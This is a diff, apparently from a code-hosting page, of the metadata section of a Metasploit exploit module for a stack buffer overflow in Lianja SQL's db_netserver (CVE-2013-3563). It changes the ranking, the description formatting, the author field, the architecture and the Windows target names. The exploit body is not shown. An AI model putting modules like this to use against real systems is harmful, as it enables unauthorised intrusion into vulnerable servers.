8
8
require 'msf/core'
9
9
10
10
class Metasploit3 < Msf ::Exploit ::Remote
11
- Rank = GoodRanking
11
+ Rank = NormalRanking
12
12
include Msf ::Exploit ::Remote ::Tcp
13
13
include Msf ::Exploit ::RopDb
14
14
15
15
def initialize ( info = { } )
16
16
super ( update_info ( info ,
17
17
'Name' => 'Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow' ,
18
18
'Description' => %q{
19
- This module exploits a stack buffer overflow in the db_netserver
20
- process which is spawned by the Lianja SQL server. The issue is
21
- fixed in Lianja SQL 1.0.0RC5.2.
19
+ This module exploits a stack buffer overflow in the db_netserver process which
20
+ is spawned by the Lianja SQL server. The issue is fixed in Lianja SQL 1.0.0RC5.2.
22
21
} ,
23
- 'Author' => [ 'Spencer McIntyre' ] ,
22
+ 'Author' => 'Spencer McIntyre' ,
24
23
'License' => MSF_LICENSE ,
25
24
'References' => [
26
- [ 'CVE' , '2013-3563' ] ,
25
+ [ 'CVE' , '2013-3563' ]
27
26
] ,
28
27
'DefaultOptions' =>
29
28
{
30
29
'WfsDelay' => 20 ,
31
30
} ,
32
31
'Platform' => 'win' ,
32
+ 'Arch' => ARCH_X86 ,
33
33
'Payload' =>
34
34
{
35
35
'StackAdjustment' => -3500 ,
@@ -38,8 +38,8 @@ def initialize(info = {})
38
38
} ,
39
39
'Targets' =>
40
40
[
41
- [ 'Windows Server 2003 SP1-SP2' , { 'rop_target' => '2003' } ] ,
42
- [ 'Windows XP SP3' , { 'rop_target' => 'xp' } ] ,
41
+ [ 'Lianja SQL 1.0.0RC5.1 / Windows Server 2003 SP1-SP2' , { 'rop_target' => '2003' } ] ,
42
+ [ 'Lianja SQL 1.0.0RC5.1 / Windows XP SP3' , { 'rop_target' => 'xp' } ] ,
43
43
] ,
44
44
'DefaultTarget' => 0 ,
45
45
'Privileged' => true ,
0 commit comments